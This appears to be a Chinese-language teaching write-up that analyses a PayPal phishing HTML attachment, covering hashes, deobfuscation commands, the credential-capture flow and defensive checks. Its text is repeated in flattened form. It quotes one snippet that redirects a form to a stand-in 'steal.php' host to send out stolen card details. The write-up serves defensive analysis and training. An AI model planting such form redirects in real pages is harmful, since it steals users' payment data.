Paypal钓鱼邮件分析
字数 1595 2025-08-26 22:11:29

PayPal钓鱼邮件技术分析教学文档

0x01 钓鱼邮件概述

网络钓鱼邮件是当前网络安全威胁中最常见的攻击载体之一,特别是针对企业内网的渗透。根据微软的报告:

  • 过去12个月内网络钓鱼邮件数量增长250%
  • 针对SaaS和网络邮件服务的钓鱼攻击翻了两倍
  • PayPal等支付平台是钓鱼攻击的高频目标

0x02 样本基本信息分析

文件属性

  • 文件名:PayPal_Document916.html
  • SHA1哈希:948fa2be822a9320f6f17599bc2066b2919ff255
  • 文件类型:Plain Text HTML
  • 熵值:6.056(中等混淆程度)
  • 未打包,文件大小约34KB

初步检测

使用Detect-It-Easy(DIE)工具分析确认:

  • 文件未被压缩
  • 仅进行了轻度混淆
  • 分析难度中等

0x03 代码结构分析

初始处理步骤

  1. 移除HTML标签保留核心JS代码: 
    <!DOCTYPE html><html><head><script></script></head><body></body></html>
  2. 使用Sublime Text配合美化插件格式化代码
  3. 命令行格式化方法: 
    awk -v RS=';' -v ORS=';\n' 'NF' PayPal_Document916.html > decoded_PayPal_Document916.js

0x04 代码反混淆技术

关键变量识别与重命名

原始变量名 重命名后 含义
nxjCDAXFwFEX raw_base64 存储Base64编码的有效载荷
xoCisgpExGEs function_01 第一个函数
sCmCMuMlIZJy function_02 第二个函数
lSiYOlcTTfmR call_array 参数主列表
TZGYADnjYnzp function_02_call 调用第二个函数

Base64解码过程

grep nxjCDAXFwFEX= decoded_PayPal_Document916.js | awk -F '"' '{print$6}' | base64 --decode >> payload
  • 使用双引号作为分隔符提取Base64字符串
  • 解码后得到的数据文件需要进一步分析

0x05 恶意功能分析

钓鱼逻辑流程

  1. 页面加载时显示合法的PayPal界面
  2. 用户输入信用卡等敏感信息
  3. 点击提交按钮时触发恶意脚本
  4. 攻击者通过变量_0x78eb7f控制数据流向

关键恶意代码特征

// 实际提交地址被动态修改
form.action = "https://malicious-domain.com/steal.php";

发现的恶意域名

  • 通过代码分析发现非PayPal官方域名
  • 这些域名用于接收用户提交的敏感信息

0x06 钓鱼页面资源分析

嵌入的图片资源

  • AM_mc_vs_ms_ae_UK.png (SHA1: f18a83299a9dbf4905e27548c13c9ceb8fb5687d)
  • bdg_secured_by_pp_2line.png (SHA1: 53b7e80a8a19959894af795969c2ff2e8589e4f0)
  • pp-logo-200px.png (SHA1: b311f639f1de20d7c70f321b90c71993aca60a44)

图片验证

  • 使用cURL检查图片来源
  • 虽然图片本身无恶意,但被用于增强钓鱼页面的可信度

0x07 防御措施

技术检测手段

  1. 检查HTML文件的熵值(高于6可能被混淆)
  2. 分析表单提交的最终目标地址
  3. 验证所有引用资源的域名合法性
  4. 检查JavaScript中的动态行为

用户教育要点

  • 警惕要求输入敏感信息的邮件
  • 手动检查网站域名是否官方
  • 不点击邮件中的直接链接,手动输入官网地址
  • 启用多因素认证

0x08 分析工具推荐

  1. Detect-It-Easy (DIE) - 文件属性分析
  2. Sublime Text + 美化插件 - 代码格式化
  3. Linux命令行工具 - awk, grep, base64等
  4. cURL - 远程资源验证
  5. SHA1校验工具 - 文件完整性验证

0x09 总结

本次分析的PayPal钓鱼邮件展示了典型的网络钓鱼技术:

  1. 使用轻度混淆的HTML/JS代码
  2. 嵌入合法图片增强可信度
  3. 动态修改表单提交地址
  4. 利用Base64编码隐藏部分逻辑

虽然技术复杂度不高,但社会工程学效果显著。安全团队应定期对员工进行钓鱼识别培训,并部署多层防御措施。

PayPal钓鱼邮件技术分析教学文档 0x01 钓鱼邮件概述 网络钓鱼邮件是当前网络安全威胁中最常见的攻击载体之一,特别是针对企业内网的渗透。根据微软的报告: 过去12个月内网络钓鱼邮件数量增长250% 针对SaaS和网络邮件服务的钓鱼攻击翻了两倍 PayPal等支付平台是钓鱼攻击的高频目标 0x02 样本基本信息分析 文件属性 文件名:PayPal_ Document916.html SHA1哈希:948fa2be822a9320f6f17599bc2066b2919ff255 文件类型:Plain Text HTML 熵值:6.056(中等混淆程度) 未打包,文件大小约34KB 初步检测 使用Detect-It-Easy(DIE)工具分析确认: 文件未被压缩 仅进行了轻度混淆 分析难度中等 0x03 代码结构分析 初始处理步骤 移除HTML标签保留核心JS代码: 使用Sublime Text配合美化插件格式化代码 命令行格式化方法: 0x04 代码反混淆技术 关键变量识别与重命名 原始变量名 | 重命名后 | 含义 ---|---|--- nxjCDAXFwFEX | raw_ base64 | 存储Base64编码的有效载荷 xoCisgpExGEs | function_ 01 | 第一个函数 sCmCMuMlIZJy | function_ 02 | 第二个函数 lSiYOlcTTfmR | call_ array | 参数主列表 TZGYADnjYnzp | function_ 02_ call | 调用第二个函数 Base64解码过程 使用双引号作为分隔符提取Base64字符串 解码后得到的数据文件需要进一步分析 0x05 恶意功能分析 钓鱼逻辑流程 页面加载时显示合法的PayPal界面 用户输入信用卡等敏感信息 点击提交按钮时触发恶意脚本 攻击者通过变量 _0x78eb7f 控制数据流向 关键恶意代码特征 发现的恶意域名 通过代码分析发现非PayPal官方域名 这些域名用于接收用户提交的敏感信息 0x06 钓鱼页面资源分析 嵌入的图片资源 AM_ mc_ vs_ ms_ ae_ UK.png (SHA1: f18a83299a9dbf4905e27548c13c9ceb8fb5687d) bdg_ secured_ by_ pp_ 2line.png (SHA1: 53b7e80a8a19959894af795969c2ff2e8589e4f0) pp-logo-200px.png (SHA1: b311f639f1de20d7c70f321b90c71993aca60a44) 图片验证 使用cURL检查图片来源 虽然图片本身无恶意,但被用于增强钓鱼页面的可信度 0x07 防御措施 技术检测手段 检查HTML文件的熵值(高于6可能被混淆) 分析表单提交的最终目标地址 验证所有引用资源的域名合法性 检查JavaScript中的动态行为 用户教育要点 警惕要求输入敏感信息的邮件 手动检查网站域名是否官方 不点击邮件中的直接链接,手动输入官网地址 启用多因素认证 0x08 分析工具推荐 Detect-It-Easy (DIE) - 文件属性分析 Sublime Text + 美化插件 - 代码格式化 Linux命令行工具 - awk, grep, base64等 cURL - 远程资源验证 SHA1校验工具 - 文件完整性验证 0x09 总结 本次分析的PayPal钓鱼邮件展示了典型的网络钓鱼技术: 使用轻度混淆的HTML/JS代码 嵌入合法图片增强可信度 动态修改表单提交地址 利用Base64编码隐藏部分逻辑 虽然技术复杂度不高,但社会工程学效果显著。安全团队应定期对员工进行钓鱼识别培训,并部署多层防御措施。